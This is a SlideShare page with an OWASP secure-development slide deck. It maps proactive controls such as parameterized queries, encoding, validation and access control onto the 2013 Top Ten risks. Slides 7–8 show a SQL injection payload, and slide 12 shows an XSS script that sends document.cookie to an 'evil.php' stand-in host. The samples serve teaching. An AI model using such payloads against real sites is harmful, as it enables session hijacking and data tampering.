SlideShare a Scribd company logo

Owasp top-ten-mapping-2015-05-lwc

Download as PPTX, PDF
K
Katy Anton

The document outlines the OWASP Top Ten security risks, which include injection flaws, broken authentication, and sensitive data exposure, among others. It provides guidelines for mitigating these risks during the software development lifecycle through practices like input validation, parameterized queries, and proper access controls. Additionally, it emphasizes the importance of incorporating security requirements and a secure architecture in software design to safeguard against vulnerabilities.

Software
1 of 50
Downloaded 51 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
OWASP Top Ten Mapping Katy Anton @katyanton 1
Katy Anton • Software developer by background • Certified Secure Software Lifecycle Practitioner (CSSLP) • OWASP volunteer • https//www.linkedin.com/in/katyanton • @katyanton 2
OWASP Top 10 Risks A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 3
Software Development Lifecycle 4 Design Build Test Production Vulnerability Scanning Security testing, dynamic testing tools Coding guidelines, code reviews, static test tools Security requirements, secure design, threat modelling reactiveproactive
Warning This is an awareness document - that will give you some anchors - that you can start using on a regular basis - and start building on. You cannot base a web application on Top 10 only! 5
C1. Parameterize queries 6 Query parameterization prevents untrusted input from being interpreted as part of a SQL command: $sql = Update users set email=‘$email’ where id=1;
C1: Example of SQL injection 7 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’;
C1: Example of SQL injection 8 UPDATE user SET email=‘’; -- @owasp.org' WHERE id=‘1’
C1 Control: Data Access Layer 9 PHP: Example of Query Parametrisation $email = $_REQUEST[‘email’]; $id = $_REQUEST[‘id’]; $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
10 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query.
C2. Encode data before using a parser 11
C2: Example of XSS 12 <script type=“text/javascript”> var adr = ‘http://myaddress.com/evil.php? stolencookies=‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
C2: Mechanisms for encoding Change from < 13
C2: Mechanisms for encoding Change from < to &lt; 14
C2: Resources Reform Project Java, .NET v1/v2, PHP, Python, Perl, JavaScript https://www.owasp.org/index.php/Category:OWASP_Enco ding_Project Java/Scala (Updated January 2015) https://www.owasp.org/index.php/OWASP_Java_Encoder_Proj ect 15
16 Proactive Control Risk(s) prevented C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query. A3 XSS XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
C3. Validate all input 17
C3: Example of Validations 18 • GET / POST data • File upload validate ( file extension, mime type, size) • HTTP Headers, cookies
19 Proactive Control Risk(s) prevented C3: Validate all inputs For web applications this includes: • GET and POST parameters: • File uploads • any or all of this data could be manipulated by an attacker. •A1 Injection •A3 XSS •A10 Unvalidated redirects and forwards
C4. Implement appropriate Access Control 20
C4: Access Control good practices • Deny by default • Force all requests to go through access control checks • Check on the server when each function is accessed 21
22 Proactive Control Risk(s) prevented C4: Implement Appropriate Access Controls •Deny by default •Force all requests to go through access control checks •Check on the server when each function is accessed A4-Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check, attackers can manipulate these references to access unauthorised data. A7-Missing Function Level Access Control Attackers will be able to forge requests in order to access functionality without proper authorization.
C5. Establish Authentication and Identity Controls 23
1). Protection: Password storage 24 1) Use cryptographically strong credential- specific salt • protect( [salt] + [password] ); • Use a 32char or 64char salt; • Do not depend on hiding, splitting, or otherwise obscuring the salt.
1). Protection: Password storage 25 2) Impose difficult verification on the attacker and defender •PBKDF2([salt] + [password], c=100,000); •Cryptgraphic recommendations: • PBKDF2 (Password-Based Key Derivation 2) • bcrypt • scrypt
1). Protection: Password storage 26 Resources: https://www.owasp.org/index.php/Password_Storage_ Cheat_Sheet
2). Protection: multi-factor authentication Multi-factor authentication - a combination of: • Something you know – password or PIN • Something you own – token, smart card or phone • Something you are – biometrics ( fingerprint ) 27
3). Protection: Forgot Password Forgot password design: 1). Ask one or more security questions 2) Send the user a randomly generated token via: app, SMS 3). Verify code in same web session. 4). Change password. More details on: https://www.owasp.org/index.php/Forgot_Password_Chea t_Sheet 28
29 Proactive Control Risk(s) prevented C5: Establish Identity and Authentication Controls • Design ( password storage) • Multi-factor authentication • Design ( forgot password ) A2-Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
C6. Data Protection and Privacy 30
C6 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you are visiting is the right one HTTPS configuration best practices • https://www.owasp.org/index.php/Transport_Layer _Protection_Cheat_Sheet Data at rest 31
C6 Controls: Data at rest 1. Algorithm • AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing Resources: • https://www.owasp.org/index.php/Cryptographic_Stor age_Cheat_Sheet • https://www.ssllabs.com/ssltest/index.html 32
33 Proactive Control Risk(s) prevented C6: Data Protection and privacy • Data encryption at rest • Data encryption in transit A6: Sensitive Data Exposure Sensitive data needs extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
34 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
35 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS OWASP Top Ten Mapping
36 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
37 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control OWASP Top Ten Mapping
38 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management OWASP Top Ten Mapping
39 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management C6: Data Protection and privacy Data encryption at rest / in transit • A6 Sensitive Data Exposure OWASP Top Ten Mapping
C7. Logging, Error Handling and Intrusion Detection 40
41 Proactive Control Risk(s) prevented C7: Implement Logging, Error Handling and Intrusion Detection A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
C8. Leverage Security Features of Frameworks and Security Libraries 42
43 Proactive Control Risk(s) prevented C8: Leverage Security Features of Frameworks and Security Libraries For example: • Choose a good database ORM • Choose a framework with already build- in good access control • Choose a framework that already has integrated CSRF A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
C9.Security Requirements 44
C9: Security Requirements Functional requirements > visible to QA and testable > E.q: forgot password workflow, re-authentication during change password Non-Functionals requirements : > invisible to QA, not easily testable > E.q: query parametrization, password storage crypto 45
46 Proactive Control Risk(s) prevented C9: Security Requirements Example of security requirements: • Integrity requirements • Availability requirements • Authentication & authorization requirements • Confidentiality requirements • Auditing and logging requirements • Session management requirements • Errors and exception management requirements • Configuration parameters requirements • Archiving requirements • Legal and Compliance Constraints A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
C10. Security Architecture and Design 47
C10: Security Architecture and Design Principles Secure design principles: • Least Privilege = minimum access level for minimum amount of time • Separation of duties • Defence of depth. E.q.: • input validation + parameterize queries • input validation + output encoding • Fail secure. E.q.: • user access denied after maximum number of failed logins reached • errors and exception handling; store error details in database, give user only the reference ID • Complete mediation. E.q.: • centralise access control checks • centralise input validation 48
49 Proactive Control Risk(s) prevented C10: Security Architecture and Design Secure design principles: • Least Privilege • Separation of duties • Defence of depth • Fail secure • Complete mediation • Open design A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
Thank you Questions 50

More Related Content

What's hot (20)

PDF
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
Aditya K Sood
 
PDF
OWASP Top 10 2017
Siddharth Phatarphod
 
PPTX
Owasp 2017 oveview
Shreyas N
 
PPTX
How to Test for The OWASP Top Ten
Security Innovation
 
PDF
Owasp top 10
YasserElsnbary
 
PPTX
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Andre Van Klaveren
 
PPTX
Owasp top 10 2017
ibrahimumer2
 
PPT
Web attacks
husnara mohammad
 
PPTX
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Security Innovation
 
PPTX
Ten Commandments of Secure Coding
Mateusz Olejarka
 
PPTX
Beyond the OWASP Top 10
iphonepentest
 
PPTX
Owasp top 10 vulnerabilities
OWASP Delhi
 
PPTX
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
PDF
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
PDF
OWASP TOP 10 & .NET
Daniel Krasnokucki
 
PDF
Problems with parameters b sides-msp
Mike Saunders
 
PDF
Owasp Top 10
Shivam Porwal
 
PDF
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Priyanka Aash
 
PDF
THOR Apt Scanner
Florian Roth
 
PPTX
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Rana Khalil
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
Aditya K Sood
 
OWASP Top 10 2017
Siddharth Phatarphod
 
Owasp 2017 oveview
Shreyas N
 
How to Test for The OWASP Top Ten
Security Innovation
 
Owasp top 10
YasserElsnbary
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Andre Van Klaveren
 
Owasp top 10 2017
ibrahimumer2
 
Web attacks
husnara mohammad
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Security Innovation
 
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Beyond the OWASP Top 10
iphonepentest
 
Owasp top 10 vulnerabilities
OWASP Delhi
 
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
OWASP TOP 10 & .NET
Daniel Krasnokucki
 
Problems with parameters b sides-msp
Mike Saunders
 
Owasp Top 10
Shivam Porwal
 
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Priyanka Aash
 
THOR Apt Scanner
Florian Roth
 
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Rana Khalil
 

Viewers also liked (20)

PDF
State of OWASP 2015
tmd800
 
PDF
Web hackingtools 2015
ColdFusionConference
 
PPTX
Appsecurity, win or loose
Bjørn Sloth
 
PDF
OWASP AppSec USA 2015, San Francisco
Clare Nelson, CISSP, CIPP-E
 
PPTX
OWASP Open SAMM
intive
 
PDF
2013 OWASP Top 10
bilcorry
 
PDF
OWASP, PHP, life and universe
Sebastien Gioria
 
ODP
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
Simon Bennetts
 
PPTX
Web Application Security | A developer's perspective - Insecure Direct Object...
n|u - The Open Security Community
 
PDF
Rebooting Software Development - OWASP AppSecUSA
Nick Galbreath
 
KEY
Owasp Au Rev4
sumsid1234
 
PPTX
Owasp top 10 security threats
Vishal Kumar
 
PDF
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
Abraham Aranguren
 
PPTX
OWASP Free Training - SF2014 - Keary and Manico
Eoin Keary
 
PPTX
RSA Europe 2013 OWASP Training
Jim Manico
 
PDF
OWASP Top Ten in Practice
Security Innovation
 
PPTX
Owasp Top 10 A1: Injection
Michael Hendrickx
 
ODP
Basic of SSDLC
Chitpong Wuttanan
 
PPTX
The OWASP Zed Attack Proxy
Aditya Gupta
 
PPTX
[Wroclaw #5] OWASP Projects: beyond Top 10
OWASP
 
State of OWASP 2015
tmd800
 
Web hackingtools 2015
ColdFusionConference
 
Appsecurity, win or loose
Bjørn Sloth
 
OWASP AppSec USA 2015, San Francisco
Clare Nelson, CISSP, CIPP-E
 
OWASP Open SAMM
intive
 
2013 OWASP Top 10
bilcorry
 
OWASP, PHP, life and universe
Sebastien Gioria
 
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
Simon Bennetts
 
Web Application Security | A developer's perspective - Insecure Direct Object...
n|u - The Open Security Community
 
Rebooting Software Development - OWASP AppSecUSA
Nick Galbreath
 
Owasp Au Rev4
sumsid1234
 
Owasp top 10 security threats
Vishal Kumar
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
Abraham Aranguren
 
OWASP Free Training - SF2014 - Keary and Manico
Eoin Keary
 
RSA Europe 2013 OWASP Training
Jim Manico
 
OWASP Top Ten in Practice
Security Innovation
 
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Basic of SSDLC
Chitpong Wuttanan
 
The OWASP Zed Attack Proxy
Aditya Gupta
 
[Wroclaw #5] OWASP Projects: beyond Top 10
OWASP
 
Ad

Similar to Owasp top-ten-mapping-2015-05-lwc (20)

PPTX
OWASP Top 10 Proactive Controls
Katy Anton
 
PDF
OWASP Top 10 Web Vulnerabilities from DCC 04/14
Chris Holwerda
 
PPT
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Braindev Kyiv
 
PDF
Secure coding presentation Oct 3 2020
Moataz Kamel
 
PPTX
The path of secure software by Katy Anton
DevSecCon
 
PPTX
OWASP top 10-2013
tmd800
 
PDF
Owasp Top 10-2013
n|u - The Open Security Community
 
PPTX
Owasp top 10_-_2010 presentation
Islam Azeddine Mennouchi
 
PPTX
Security For Application Development
6502programmer
 
PDF
Web application sec_3
vhimsikal
 
PPTX
OWASP Top Ten 2017
Michael Furman
 
PPT
Secure code practices
Hina Rawal
 
PDF
Top 10 web application security risks akash mahajan
Akash Mahajan
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
FernandoVizer
 
PPTX
ASP.NET security vulnerabilities
Aleksandar Bozinovski
 
PDF
Threat Modeling for Web Applications (and other duties as assigned)
Mike Tetreault
 
PPTX
owasp top 10 security risk categories and CWE
Arun Voleti
 
PPTX
Secure Software Engineering
Rohitha Liyanagama
 
PDF
owasp-top-10 presentation dhs ad health .
Soner ÇELİK, CEH, PMP
 
PDF
OWASP Top 10
Arthur Shvetsov
 
OWASP Top 10 Proactive Controls
Katy Anton
 
OWASP Top 10 Web Vulnerabilities from DCC 04/14
Chris Holwerda
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Braindev Kyiv
 
Secure coding presentation Oct 3 2020
Moataz Kamel
 
The path of secure software by Katy Anton
DevSecCon
 
OWASP top 10-2013
tmd800
 
Owasp Top 10-2013
n|u - The Open Security Community
 
Owasp top 10_-_2010 presentation
Islam Azeddine Mennouchi
 
Security For Application Development
6502programmer
 
Web application sec_3
vhimsikal
 
OWASP Top Ten 2017
Michael Furman
 
Secure code practices
Hina Rawal
 
Top 10 web application security risks akash mahajan
Akash Mahajan
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
FernandoVizer
 
ASP.NET security vulnerabilities
Aleksandar Bozinovski
 
Threat Modeling for Web Applications (and other duties as assigned)
Mike Tetreault
 
owasp top 10 security risk categories and CWE
Arun Voleti
 
Secure Software Engineering
Rohitha Liyanagama
 
owasp-top-10 presentation dhs ad health .
Soner ÇELİK, CEH, PMP
 
OWASP Top 10
Arthur Shvetsov
 
Ad

Recently uploaded (20)

PDF
MiniTool Power Data Recovery Crack New Pre Activated Version Latest 2025
imang66g
 
PDF
How Agentic AI Networks are Revolutionizing Collaborative AI Ecosystems in 2025
ronakdubey419
 
PDF
System Center 2025 vs. 2022; What’s new, what’s next_PDF.pdf
Q-Advise
 
PDF
advancepresentationskillshdhdhhdhdhdhhfhf
jasmenrojas249
 
PDF
Using licensed Data Loss Prevention (DLP) as a strategic proactive data secur...
Q-Advise
 
PDF
Enhancing Healthcare RPM Platforms with Contextual AI Integration
Cadabra Studio
 
PPTX
TexSender Pro 8.9.1 Crack Full Version Download
cracked shares
 
PPT
Brief History of Python by Learning Python in three hours
adanechb21
 
PPTX
ChessBase 18.02 Crack + Serial Key Free Download
cracked shares
 
PDF
Malaysia’s e-Invoice System: A Complete Guide for Businesses
Matiyas Solutions
 
PDF
Applitools Platform Pulse: What's New and What's Coming - July 2025
Applitools
 
PDF
Why Are More Businesses Choosing Partners Over Freelancers for Salesforce.pdf
Cymetrix Software
 
PDF
Generating Union types w/ Static Analysis
K. Matthew Dupree
 
PDF
AI Software Engineering based on Multi-view Modeling and Engineering Patterns
Hironori Washizaki
 
PDF
Virtual Threads in Java: A New Dimension of Scalability and Performance
Tier1 app
 
PPTX
slidesgo-unlocking-the-code-the-dynamic-dance-of-variables-and-constants-2024...
kr2589474
 
PDF
Step-by-Step Guide to Install SAP HANA Studio | Complete Installation Tutoria...
SAP Vista, an A L T Z E N Company
 
PPTX
Farrell__10e_ch04_PowerPoint.pptx Programming Logic and Design slides
bashnahara11
 
PDF
SAP GUI Installation Guide for macOS (iOS) | Connect to SAP Systems on Mac
SAP Vista, an A L T Z E N Company
 
PDF
Salesforce Pricing Update 2025: Impact, Strategy & Smart Cost Optimization wi...
GetOnCRM Solutions
 
MiniTool Power Data Recovery Crack New Pre Activated Version Latest 2025
imang66g
 
How Agentic AI Networks are Revolutionizing Collaborative AI Ecosystems in 2025
ronakdubey419
 
System Center 2025 vs. 2022; What’s new, what’s next_PDF.pdf
Q-Advise
 
advancepresentationskillshdhdhhdhdhdhhfhf
jasmenrojas249
 
Using licensed Data Loss Prevention (DLP) as a strategic proactive data secur...
Q-Advise
 
Enhancing Healthcare RPM Platforms with Contextual AI Integration
Cadabra Studio
 
TexSender Pro 8.9.1 Crack Full Version Download
cracked shares
 
Brief History of Python by Learning Python in three hours
adanechb21
 
ChessBase 18.02 Crack + Serial Key Free Download
cracked shares
 
Malaysia’s e-Invoice System: A Complete Guide for Businesses
Matiyas Solutions
 
Applitools Platform Pulse: What's New and What's Coming - July 2025
Applitools
 
Why Are More Businesses Choosing Partners Over Freelancers for Salesforce.pdf
Cymetrix Software
 
Generating Union types w/ Static Analysis
K. Matthew Dupree
 
AI Software Engineering based on Multi-view Modeling and Engineering Patterns
Hironori Washizaki
 
Virtual Threads in Java: A New Dimension of Scalability and Performance
Tier1 app
 
slidesgo-unlocking-the-code-the-dynamic-dance-of-variables-and-constants-2024...
kr2589474
 
Step-by-Step Guide to Install SAP HANA Studio | Complete Installation Tutoria...
SAP Vista, an A L T Z E N Company
 
Farrell__10e_ch04_PowerPoint.pptx Programming Logic and Design slides
bashnahara11
 
SAP GUI Installation Guide for macOS (iOS) | Connect to SAP Systems on Mac
SAP Vista, an A L T Z E N Company
 
Salesforce Pricing Update 2025: Impact, Strategy & Smart Cost Optimization wi...
GetOnCRM Solutions
 

Owasp top-ten-mapping-2015-05-lwc

  • 1. OWASP Top Ten Mapping Katy Anton @katyanton 1
  • 2. Katy Anton • Software developer by background • Certified Secure Software Lifecycle Practitioner (CSSLP) • OWASP volunteer • https//www.linkedin.com/in/katyanton • @katyanton 2
  • 3. OWASP Top 10 Risks A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 3
  • 4. Software Development Lifecycle 4 Design Build Test Production Vulnerability Scanning Security testing, dynamic testing tools Coding guidelines, code reviews, static test tools Security requirements, secure design, threat modelling reactiveproactive
  • 5. Warning This is an awareness document - that will give you some anchors - that you can start using on a regular basis - and start building on. You cannot base a web application on Top 10 only! 5
  • 6. C1. Parameterize queries 6 Query parameterization prevents untrusted input from being interpreted as part of a SQL command: $sql = Update users set email=‘$email’ where id=1;
  • 7. C1: Example of SQL injection 7 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’;
  • 8. C1: Example of SQL injection 8 UPDATE user SET email=‘’; -- @owasp.org' WHERE id=‘1’
  • 9. C1 Control: Data Access Layer 9 PHP: Example of Query Parametrisation $email = $_REQUEST[‘email’]; $id = $_REQUEST[‘id’]; $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
  • 10. 10 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query.
  • 11. C2. Encode data before using a parser 11
  • 12. C2: Example of XSS 12 <script type=“text/javascript”> var adr = ‘http://myaddress.com/evil.php? stolencookies=‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
  • 13. C2: Mechanisms for encoding Change from < 13
  • 14. C2: Mechanisms for encoding Change from < to &lt; 14
  • 15. C2: Resources Reform Project Java, .NET v1/v2, PHP, Python, Perl, JavaScript https://www.owasp.org/index.php/Category:OWASP_Enco ding_Project Java/Scala (Updated January 2015) https://www.owasp.org/index.php/OWASP_Java_Encoder_Proj ect 15
  • 16. 16 Proactive Control Risk(s) prevented C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query. A3 XSS XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 17. C3. Validate all input 17
  • 18. C3: Example of Validations 18 • GET / POST data • File upload validate ( file extension, mime type, size) • HTTP Headers, cookies
  • 19. 19 Proactive Control Risk(s) prevented C3: Validate all inputs For web applications this includes: • GET and POST parameters: • File uploads • any or all of this data could be manipulated by an attacker. •A1 Injection •A3 XSS •A10 Unvalidated redirects and forwards
  • 20. C4. Implement appropriate Access Control 20
  • 21. C4: Access Control good practices • Deny by default • Force all requests to go through access control checks • Check on the server when each function is accessed 21
  • 22. 22 Proactive Control Risk(s) prevented C4: Implement Appropriate Access Controls •Deny by default •Force all requests to go through access control checks •Check on the server when each function is accessed A4-Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check, attackers can manipulate these references to access unauthorised data. A7-Missing Function Level Access Control Attackers will be able to forge requests in order to access functionality without proper authorization.
  • 23. C5. Establish Authentication and Identity Controls 23
  • 24. 1). Protection: Password storage 24 1) Use cryptographically strong credential- specific salt • protect( [salt] + [password] ); • Use a 32char or 64char salt; • Do not depend on hiding, splitting, or otherwise obscuring the salt.
  • 25. 1). Protection: Password storage 25 2) Impose difficult verification on the attacker and defender •PBKDF2([salt] + [password], c=100,000); •Cryptgraphic recommendations: • PBKDF2 (Password-Based Key Derivation 2) • bcrypt • scrypt
  • 26. 1). Protection: Password storage 26 Resources: https://www.owasp.org/index.php/Password_Storage_ Cheat_Sheet
  • 27. 2). Protection: multi-factor authentication Multi-factor authentication - a combination of: • Something you know – password or PIN • Something you own – token, smart card or phone • Something you are – biometrics ( fingerprint ) 27
  • 28. 3). Protection: Forgot Password Forgot password design: 1). Ask one or more security questions 2) Send the user a randomly generated token via: app, SMS 3). Verify code in same web session. 4). Change password. More details on: https://www.owasp.org/index.php/Forgot_Password_Chea t_Sheet 28
  • 29. 29 Proactive Control Risk(s) prevented C5: Establish Identity and Authentication Controls • Design ( password storage) • Multi-factor authentication • Design ( forgot password ) A2-Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
  • 30. C6. Data Protection and Privacy 30
  • 31. C6 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you are visiting is the right one HTTPS configuration best practices • https://www.owasp.org/index.php/Transport_Layer _Protection_Cheat_Sheet Data at rest 31
  • 32. C6 Controls: Data at rest 1. Algorithm • AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing Resources: • https://www.owasp.org/index.php/Cryptographic_Stor age_Cheat_Sheet • https://www.ssllabs.com/ssltest/index.html 32
  • 33. 33 Proactive Control Risk(s) prevented C6: Data Protection and privacy • Data encryption at rest • Data encryption in transit A6: Sensitive Data Exposure Sensitive data needs extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
  • 34. 34 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
  • 35. 35 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS OWASP Top Ten Mapping
  • 36. 36 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
  • 37. 37 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control OWASP Top Ten Mapping
  • 38. 38 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management OWASP Top Ten Mapping
